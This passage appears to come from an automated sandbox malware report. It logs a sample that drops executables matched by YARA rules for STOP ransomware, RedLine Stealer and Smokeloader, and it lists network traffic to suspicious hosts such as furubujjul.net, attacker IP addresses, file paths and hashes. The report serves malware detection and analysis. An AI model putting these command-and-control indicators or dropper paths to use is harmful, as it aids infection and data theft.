                  Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com^i# equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.come equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: y5gLo05www.facebook.comGyfg23OMn2qknLZ equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: }Twww.facebook.com equals www.facebook.com (Facebook)
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: furubujjul.net
                  Source: unknownHTTPS traffic detected: 172.67.144.83:443 -> 192.168.2.5:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.5:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.23.58.153:443 -> 192.168.2.5:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49745 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: F4FD.exe, 00000006.00000002.521322299.00000000007BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: Yara matchFile source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR

                  System Summary

                  barindex
                  Source: 9.0.ECFD.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                  Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                  Source: 2A57.exe.1.drStatic PE information: .vmp0 and .vmp1 section names
                  Source: C:\Users\user\AppData\Local\Temp\3804.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004184DE
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A101
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418A22
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004132DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409BD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413B84
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E390
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413F90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417F9A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004137B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004143B0
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_004184DE
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_0041A101
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00418A22
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_004132DB
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00409BD0
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00413B84
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_0040E390
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00413F90
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00417F9A
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_004137B0
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_004143B0
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_004184DE
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0041A101
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_00418A22
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_004132DB
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_00409BD0
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_00413B84
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040E390
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_00413F90
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_00417F9A
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_004137B0
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_004143B0
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2A57.exe A8756585EF0E2E4E7479606E49A56E52C871C24B65C356B6B38F29CBAE300ECC
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 9.0.ECFD.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
